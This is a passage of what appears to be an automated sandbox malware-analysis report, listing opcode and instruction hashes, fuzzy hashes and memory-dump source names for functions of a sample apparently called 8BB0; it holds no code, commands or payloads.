                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
                                                                                                                                                                                                                                        • Instruction ID: 005a84f34606d807ef7803f473bdaa3d6e6b3e5a6c55ca812da06d8011db77a6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19613839A0C3914FC325CF39C88095B7BE16F96314F4881AEECA54B392D639EC45D796
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a16964f98263bb64d29cf427ecac629650e46b659aa8a65445bff108377c5da2
                                                                                                                                                                                                                                        • Instruction ID: f676e5b9432c33ffef44a1b1f57224471e9f088040e674a188aeacb8ec61d250
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a16964f98263bb64d29cf427ecac629650e46b659aa8a65445bff108377c5da2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 626139356083918FD726CF3CC84092B7BE1AF96214F5886AEE8E48B392D775D805D792
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a9beccb418eb2a315fce9c1fee449ff7612de2d6f2e7ef11585c31999dd8e919
                                                                                                                                                                                                                                        • Instruction ID: 79698480e789f394c927d8fe7c13ac859d6e499323d4242f8a9ce8e9df0e27f7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9beccb418eb2a315fce9c1fee449ff7612de2d6f2e7ef11585c31999dd8e919
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75516875608301ABD310AF65DC81B2BB7E5EB9A704F16A83EF58197281D7B8DC00DB96
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 896f3fb295f70a3d1d2d868c2c2a0e71ef34daf535ef3f76e5866041dfd6add5
                                                                                                                                                                                                                                        • Instruction ID: 0acb163b32036e4a0141e1416494cde24ef865be389d025f0ab24698050b1e5e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 896f3fb295f70a3d1d2d868c2c2a0e71ef34daf535ef3f76e5866041dfd6add5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 726178B56003028FE768CF69D891252FBA1FF46300B1996ACC09A8F752E378E5C1CB95
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
                                                                                                                                                                                                                                        • Instruction ID: f3345cb18c34d22cea7c76b8972ea9c026089d6dd7aab1ac627898e589a0e88a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E416676A687148FC328DF64DCC427BB2A2EBDA310F1E952D8AE61B354DB644D018689
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
                                                                                                                                                                                                                                        • Instruction ID: e05f0c28abb23196ba61ad0833066cadbdf31242ed8b811a8d6999a0959d69a3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 71416776E587148FC728EF64D8C067BB3A2EFDA319F1E853D8AD61B354DAB04D008649
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
                                                                                                                                                                                                                                        • Instruction ID: 6458c2a36ad1cb1d3c56fad7511fb74c051b1bd8ee895f970e959f4703a01e69
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 404117A02083D18BD7358F3990607B7BFD19FA3219F5948ADC6C597283D7784007C71A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
                                                                                                                                                                                                                                        • Instruction ID: eefe03b18743b49871fb2489c600001347596f91441baaeaf7fe424ebba1ff57
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2541B1A01083D18ADB368F398070BBBBBE1EF9325DF1949ADC2D6A7682D7754007C759
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                                                                                                                                                                                                        • Instruction ID: f0dfe561e574c5b04bf144357c30d0d8e3624fae8d6a5d5d31a0a28d0469a5e5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4515A7551C3408FD324CF24D880A6BB7F2EFC6304F14996CF886A7291D7349906CB4A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                                                                                                                                                                                                        • Instruction ID: c54602528eb230960a828dcbedd2157f1ad61cb1e94e4a0ea2bde46ba391d34a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6251467951C3418FD324CF24D880AABB7F2EFD6305F18995CF886AB2A5DB309906C756
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: afec766a8f46cebfa70309c7c12ba714155290e18f5d997497038f4e7e1a0749
                                                                                                                                                                                                                                        • Instruction ID: 5e095237673f65371e2355eed2a43a73f9b1c126932a47d1494c0915568eebaa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: afec766a8f46cebfa70309c7c12ba714155290e18f5d997497038f4e7e1a0749
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A54126B5A002418BD7658F3DC8917B773E2EF92318F28856ED492CBBA1E779E441CB10
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                        • Instruction ID: df0643d0793dd6d859baae3aaafaf1000bf3a96435c36713bdd1cf9414b21aca
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE41B4A021C3D18BD7358B34A0607BBBBD09F93219F54599DC6D6A7283D7394407CB5E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                        • Instruction ID: b4d62b299878a4a5792d8a10337c999bf652c3f753afeee033a0933f569c92ee
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C419FA010C3D18ADB368B349060BBBBBE0EF9325CF18599DC2D6A7682D7354007CB5A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: b3442938981b70338c85b6fdcef42b4b1049c4e4fc606aed39a4a87bba456e78
                                                                                                                                                                                                                                        • Instruction ID: 7eae9215ca6338c69a0ceb573f820106f40554e72b5fa02d6e49c53ff67e8636
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3442938981b70338c85b6fdcef42b4b1049c4e4fc606aed39a4a87bba456e78
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35418A75A587148FD724AF54ACC067BB3A2FF86329F1E452DC6E617350E7A08D008644
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                        • Instruction ID: 78121dedb2d80148adf018004532891c25ca3ce7b5d6c479fa077a4fb261e508
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C316879A587188FC328EF54E8C427BB3B0EB8B310F2E952D8AE51B350D7648D01878D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                        • Instruction ID: 736fe16934b365fffd1cc62355216edbadc49a7567731f0bf95600f40111e214
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03317779A587148FC728EFA4E8C057BB3A1FF8B319F1E852D86E60B350D7B08D008649
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a7540190068c50c970c78dd1fb816c39bd2abd836d4de7d463699aecd841a6eb
                                                                                                                                                                                                                                        • Instruction ID: 1fbd39d4e737e80d992c4f304008837d64a15d296712c5bc13c03c0a2cd921de
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7540190068c50c970c78dd1fb816c39bd2abd836d4de7d463699aecd841a6eb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A419FB26087908BD734CF24C85179FBAF6EBD1214F498E2CD4CAAB345E73589058B87
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 888aa382685d0caeac7857589a895e4d05e9bcb5ed8514602e835cd5541883fc
                                                                                                                                                                                                                                        • Instruction ID: d85d8e7ba49753ff7f36d3ed97c285ab1e5e24199585a0ad528ba1d19501f263
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 888aa382685d0caeac7857589a895e4d05e9bcb5ed8514602e835cd5541883fc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7313B602083A15BD3B58B2864B077F7BD2DF87304F68496DD0C9872A2D7289485C74E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                        • Instruction ID: eb231649460b60e8b645cff36354959ad8fc4f47b4bc3ecb8744b755d441be80
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC3191A02083E18BDB358F2491207FBBBE0AB93259F54499DC7D9A7683D7384017CB5E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                        • Instruction ID: 4544445e10235d190913815babb248e09d50a2445c284c295a035b30f7c6d534
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE316FA01083D18ADB358F259020BFBBBE0EB9325DF18899DC2D5A7683D7344047CB5A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e0dc337c31b60e59c40b3c4b66153a54b5a75c190226419d79e85c67cff8ed99
                                                                                                                                                                                                                                        • Instruction ID: c284ebcc9172e9f0d142b58a160b074b689d8ff9a89050227bc8469e64bd8bba
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e0dc337c31b60e59c40b3c4b66153a54b5a75c190226419d79e85c67cff8ed99
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5831097411C7C28BE7A54B2898B0BBBBBD2DF83204F28596ED0CA87292DB254445CB56
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 546c49f651c2ee0ec7203154adbd460b810419c4e5ed9a3c8b647bf01d903c3f
                                                                                                                                                                                                                                        • Instruction ID: 0bc00ace131d253a31b9d4827398b5cfcb365b3c47e761a62e433b70b40236d0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 546c49f651c2ee0ec7203154adbd460b810419c4e5ed9a3c8b647bf01d903c3f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 533144B27183448FC724CF648CA167BB362EB96748F1D863EDA8583741D775C9028B46
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 8b6e21541edddda7d0cafdb5479713d3008093deab5e063b60f74b86252a7a36
                                                                                                                                                                                                                                        • Instruction ID: 608a5c001c9016f47e6d849a3a7bf8eb37f8ca910ed307557679ae7e480cd3ab
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b6e21541edddda7d0cafdb5479713d3008093deab5e063b60f74b86252a7a36
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F31F139E146009AE325AB598C807377753FBC7300F68D13EE092A32E9DA38AC16874D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 9879a937105e083bd9aef7d9b8e876d5a873d896f238b78d14b88aad6da131cd
                                                                                                                                                                                                                                        • Instruction ID: c71959ae7afea59e7b6bca2c2d7b825c156960f842abfb55dea4ded4627284cf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9879a937105e083bd9aef7d9b8e876d5a873d896f238b78d14b88aad6da131cd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D31E534A18501DAE7269B198C40B767763FFDB305F58926ED0C6832A8DB34A852CB24
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                        • Instruction ID: 4f1d9a8e55b01d87ed81b452fa3618ff49b1b83c19e4b1c484c24ed6b64955da
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78212921718B550BD728DE3988D132BF7D39BCB210F48D63EC5938B2D6CA34D9054688
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
